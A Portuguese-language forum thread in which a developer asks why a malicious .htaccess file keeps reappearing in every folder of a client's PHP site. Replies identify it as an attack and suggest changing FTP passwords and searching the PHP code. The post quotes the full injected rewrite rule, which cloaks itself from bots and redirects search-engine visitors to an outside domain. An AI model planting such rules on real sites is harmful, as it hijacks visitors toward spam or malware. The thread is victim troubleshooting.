Publicado em 24 de mai.

arquivo .htaccess ferrando minha aplicação --'

Bom dia pessoal, tudo bom?

Seguinte, eu estou com um sério problema em um site de um cliente meu.

Do nada em todas as pastas do site ele gera um arquivo .htacess com esse conteudo.

exgocgkctswo

RewriteEngine On RewriteCond %{REQUEST_METHOD} ^GET$ RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).$ [NC] RewriteCond %{HTTP_REFERER} !^.(q\=cache\:).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).$ [NC] RewriteCond %{HTTP_COOKIE} !^.xccgtswgokoe.$ RewriteCond %{HTTPS} ^off$ RewriteRule ^(.*)$ http://infernomag.com/cgi-bin/r.cgi?p=10003&i=e3ee120f&j=329&m=96372420d034312d027f50a414fb23e2&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]

exgocgkctswo

o problema é que ele trava o site inteiro e deixa o site fora do ar com o erro: INTERNAL SERVER ERROR.

quando eu excluo esses arquivos .htacess de todas as pastas ele volta a funcionar corretamente, só que passa uns 2 dias e o site fica fora do ar novamente, e quando vou ver esse arquivo .htacess está em todas as pastas novamente.

Ja liguei pra empresa de hospedagem do site, e eles dizem que é erro na aplicação. O site está feito em php, mais ele estava no ar há mais de 1 ano e nunca tinha dado esse erro antes, e no meu servidor local WAMP, não gera esse arquivo maldito.

Alguém tem uma solução pra esse arquivo? Meu cliente está muito bravo e o responsavel pelo site sou eu. Para eles não interessa se é a empresa de hospedagem e tals. Por este motivo estou quase perdendo o cliente.

Aguardo um retorno pessoal. Valew mesmo!

Abração!

Discussão (3)

Entre ou cadastre-se para participar da discussão

Entrar Criar conta

Leozitho· 24 de mai.

Ao que tudo indica isso é um ataque, note que o objetivo deste arquivo .htaccess criado é redirecionar para esse site: http://infernomag.com/

Só resta saber se o atacante editou algum arquivo PHP do site que faz com que esse arquivo .htaccess seja criado novamente automaticamente ou se ele cria ou envia sempre o arquivo .htaccess acessando a sua hospedagem via FTP ou SSH.

De qualquer forma altere a sua senha de FTP para uma com maior complexibilidade (misturando letras, números e outros caracteres aleatórios e não sequenciais) e faça o upload novamente de todos os arquivos que você tem na sua máquina.

Verifique também os seus arquivos PHP afim de descobrir se existem vulnerabilidades que possam estar sendo exploradas por esse atacante.

Rob_Bor· 24 de mai.

Bom dia Leozitho, vou mudar minha senha FTP e mandar fazer o upload do site novamente.

Assim retorno o resultado pra ti.

Valew!

Abraços!

César Boulevar· 24 de mai.

Seria interessante, você abrir todos os arquivos PHP, e procurar por .htaccess, e ver se os mesmos não estão criando o .htaccess. Existem editores como o notepad++ que procuram determinada palavra em mais de um arquivo.